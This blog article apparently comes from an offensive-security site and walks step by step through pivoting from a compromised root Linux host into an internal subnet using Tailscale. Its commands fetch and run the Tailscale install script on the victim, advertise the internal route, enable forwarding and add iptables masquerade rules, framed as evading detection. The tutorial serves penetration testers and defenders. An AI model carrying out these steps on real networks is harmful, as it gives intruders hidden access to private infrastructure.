Bipolar Disorder: Pivoting with TailScale
Pivoting is used in a post-exploitation context and has many techniques. In this article I will also demonstrate the ability to move around the network using TailScale.
Pivoting is used in a post-exploitation context and has many techniques. In this article I will also demonstrate the ability to move around the network using TailScale.
Caster - Bipolar Disorder
Genre: Offensive, Experimental
Label: exploit.org
Release Date: 15 November 2024
Performed by: Caster
Written by: Magama Bazarov
Mastered by: Magama Bazarov, Anastasia Graves
Cover Man: Magama Bazarov (Sony ILCE-7M3, f/5.6, 1/3 sec)
Cover Edit: Caster
https://blog.exploit.org/caster-bipolar-disorder
Intro
TailScale - is a VPN solution based on the Wireguard protocol that solves many problems related to NAT and network complexity. Due to its speed and convenience, this tool can be used by attackers to infiltrate networks and create virtual connections, allowing them to bypass restrictions and reach hidden network segments.
In this article, I will demonstrate how an attacker can use TailScale to gain a foothold in a compromised network and then move on to other subnets, bypassing NAT restrictions and minimizing the possibility of detection. We will focus on attacking a compromised Linux host using TailScale to create bridges between networks.
Disclaimer
This article is of an introductory nature and is intended solely for information security specialists conducting testing within the framework of concluded contracts. The author and the editorial staff are not liable for any damage caused by the use of the information presented. The distribution of malware, disruption of systems and confidentiality of correspondence is a violation of the law and may result in criminal liability.
TailScale Intro
TailScale is a solution designed to create virtual networks between devices and is an analog of the well-known ZeroTier. Its key feature is its ease of use and automatic setup of connections between nodes without the need for complex configuration.
Key features of TS include:
- Ease of use: TailScale automatically manages encryption keys and connection setup, eliminating the need for manual configuration. This allows users to easily deploy a network with minimal technical effort;
- NAT traversal: One of TailScale's main advantages is its ability to bypass NAT and other network restrictions. This is accomplished through tunneling technology, making it ideal for remote access to systems behind routers and firewalls;
- Versatility: TailScale supports a wide range of routing and network access control capabilities. For example, it can be used to announce routes to local networks and make them available to other devices on the TailScale network. Speaking of which, this nuance will be used by the attacker in this paper;
- Cross-platform: TailScale supports multiple platforms including Windows, Linux, macOS, iOS and Android, allowing it to be used on almost any device. This makes it convenient for both personal use and corporate needs;
- Flexibility in network management: TailScale offers flexible customization through its management console, where you can easily add new nodes, manage permissions and monitor activity.
To get started with TS, you must register an account.
This is done very simply, so I will not describe the process in detail.
Scenario
The following scenario will be covered in this article. An attacker from the Internet has compromised a Linux machine and due to privilege escalation has root privileges. The compromised machine itself has two interfaces and the attacker's task will be to gain access to the infrastructure behind eth1
This will be accomplished by installing TailScale on the attacker's and the compromised machine's systems, configuring routing and NAT.
Host | Address | Operating System |
---|---|---|
Attacker | 100.X.Y.Z (TailScale Virtual Link) | Kali Linux 2024.3 |
Victim | 100.X.Y.Z (TailScale Virtual Link) | Debian 12 |
RB7 | 172.16.150.223/24 | Windows 10 Enterprise LTSC |
RB8 | 172.16.150.221/24 | Windows 10 Enterprise LTSC |
RB9 | 172.16.150.224/24 | Windows 10 Enterprise LTSC |
RB10 | 172.16.150.226/24 | Windows 10 Enterprise LTSC |
Remarks
- This is a scenario in which the attacker is on the Internet and has compromised the host behind the NAT;
- Root privileges are required to install TS.
TS Deploying (Compromised Host)
First, TailScale must be installed on the compromised machine. This is accomplished by downloading a special .sh
file and then executing it:
@compromised:~# curl -fsSL https://tailscale.com/install.sh | sh
Then you need to activate the TS operation, this is done with one simple command:
@compromised:~# tailscale up
After this action, a link will be generated to connect the compromised machine to the TailScale virtual network:
@compromised:~# tailscale up
To authenticate, visit:
https://login.tailscale.com/a/10ec90a1013477
After clicking on the “Connect” button - the compromised machine has successfully connected to the TailScale network.
@compromised:~# tailscale up
To authenticate, visit:
https://login.tailscale.com/a/10ec90a1013477
Success.
This can be verified from the TS control panel:
After installing TailScale and running it - a virtual interface tailscale0
will appear on the compromised machine, it is designed to work with the TS virtual network:
4: tailscale0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1280 qdisc fq_codel state UNKNOWN group default qlen 500
link/none
inet 100.77.225.125/32 scope global tailscale0
valid_lft forever preferred_lft forever
inet6 fd7a:115c:a1e0::ae01:e17d/128 scope global
valid_lft forever preferred_lft forever
inet6 fe80::231a:9bfb:31a6:f5b3/64 scope link stable-privacy
valid_lft forever preferred_lft forever
Now it is necessary to make an announcement of the route. According to the network diagram, behind the compromised machine is interface eth1
with an address in the range 172.16.150.0/24
.
This route announcement is necessary so that the attacker, when connecting to the TS network, will automatically receive this route and be able to communicate with the internal infrastructure using it. This is done simply, in two commands:
root@compromised:~# tailscale down
root@compromised:~# tailscale up --advertise-routes=172.16.150.0/24
The TS service is first shut down and then brought up with the --advertise-routes
argument with respect to the 172.16.150.0/24
subnet.
After restarting TS with the --advertise-routes
argument, you must go into the settings of the compromised machine in the control panel and configure this announcement:
This completes the initial installation of TailScale on the compromised machine. I'll come back to the routing and NAT settings a bit later, now we need to do the identical steps on the attacker's machine.
Why use 100.X.Y.Z addresses?
Tailscale automatically assigns each device on its network a unique IP address. These addresses belong to a range of addresses defined in RFC 6598 known as Carrier-Grade NAT.
CGNAT addresses are taken from the special IPv4 range 100.64.0.0.0/10
, which covers the range 100.64.0.0
to 100.127.255.255
. They are special purpose addresses (RFC5735), similar to private IP addresses such as 10.0.0.0/8
or 192.168.0.0/16
Tailscale uses addresses from the CGNAT range for several reasons:
- These addresses have little or no overlap with ranges commonly used on private networks, such as
10.0.0.0/8
or192.168.0.0/16
- CGNAT addresses are suitable for intermediate traffic that requires additional NAT before reaching the Internet. This coincides with Tailscale's NAT mechanism of operation
The use of CGNAT allows Tailscale to operate effectively without conflict with existing networks.
TS Deploying (Attacker Host)
Same old same old: downloading and executing the sh-script:
caster@kali:~$ sudo curl -fsSL https://tailscale.com/install.sh | sh
Then TS service activation:
caster@kali:~$ sudo tailscale up
To authenticate, visit:
https://login.tailscale.com/a/1506661201d021
Connecting Kali to the TailScale virtual network:
After clicking on the “Connect” button - the attacker's machine will connect to the TS network:
Kali will also have its own virtual tailscale0
interface directly for working with virtual networking:
3: tailscale0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1280 qdisc fq_codel state UNKNOWN group default qlen 500
link/none
inet 100.97.65.120/32 scope global tailscale0
valid_lft forever preferred_lft forever
inet6 fd7a:115c:a1e0::ff01:4178/128 scope global
valid_lft forever preferred_lft forever
inet6 fe80::8519:d82:f240:e9bf/64 scope link stable-privacy proto kernel_ll
valid_lft forever preferred_lft forever
However, since we previously configured route announcement, we need to restart TailScale on the attacker's machine with the --accept-routes
argument:
caster@kali:~$ sudo tailscale down
caster@kali:~$ sudo tailscale up --accept-routes
The attacker will then be able to access 172.16.150.0/24
using this route
What is noteworthy is that the operating system itself does not have the route 172.16.150.0/24
, but routing through TS will work.
Routing, NAT
The routing and NAT configuration stage is key to the successful operation of the tunnel. It allows you to redirect traffic between network interfaces and correctly handle packets coming from different hosts. Here we will use three basic commands, each of which performs an important function in the routing and NAT configuration process.
Forwarding
First, you need to enable kernel-level routing by enabling packet forwarding. This is accomplished with the following command:
@compromised:~# sysctl -w net.ipv4.ip_forward=1
This command modifies the ip_forward
parameter , which allows IP packets to be forwarded between interfaces on this host. Without this step, traffic will not be forwarded, making it necessary for all configurations with NAT and routing.
FW Rules
Now we need to create routing rules for the Tailscale tunnel to work correctly using iptables
. These rules determine how packets are handled when they are forwarded across interfaces:
@compromised:~# iptables -A FORWARD -i eth1 -o tailscale0 -m state --state RELATED,ESTABLISHED -j ACCEPT
@compromised:~# iptables -A FORWARD -i tailscale0 -o eth1 -j ACCEPT
Rules Breakdown
- The first command allows forwarding traffic that was initiated from the remote side and returned back. It checks the state of the connection and accepts packets that are in the
RELATED,ESTABLISHED
state . This is important to support already existing sessions; - The second command allows all packets that pass from the
tailscale0
interface toeth1
to be forwarded to allow connection to network resources behind NAT.
To complete the routing and NAT configuration, let's add another rule for masquerading so that traffic is correctly forwarded to the 172.16.150.0/24
subnet representing the target infrastructure:
@compromised:~# iptables -t nat -A POSTROUTING -o tailscale0 -d 172.16.150.0/24 -j MASQUERADE
These rules allow the tunnel to operate transparently, redirecting traffic between interfaces and allowing devices on both sides of the network to see each other.
Impact
After all the configurations, the attacker has connectivity to 172.16.150.0/24
, to clearly demonstrate the impact of this piitting method I will demonstrate a couple of utilities.
NetExec
Port Scan
Proof of traffic flow through TS
As you can see on the screenshot, traffic regarding the 172.16.150.0/24
network successfully passes through the TailScale node.
Outro
Tailscale is a tool for building secure networks on top of the Internet. It provides easy setup, automatic routing, and secure connectivity between devices without the need for complex configuration. However, like any other technology, Tailscale can be used for unexpected purposes.
In the hands of an attacker, Tailscale becomes an unusually effective tool for pivoting. Using its routing, NAT and automatic NAT piercing capabilities, an attacker can easily penetrate internal networks and pass traffic between different segments while remaining invisible to standard defense mechanisms. For example, a properly configured Tailscale tunnel can be used to gain access to private resources and infrastructures that would be inaccessible using traditional VPNs.
It is important to note that using Tailscale for pivoting is an extremely specific reserch that differs significantly from traditional methods. It requires a deep understanding of networking, NAT technologies, and detailed configuration of routing and firewalls. This makes this approach more complex, but also more sophisticated, giving the attacker unique opportunities to penetrate the target networks.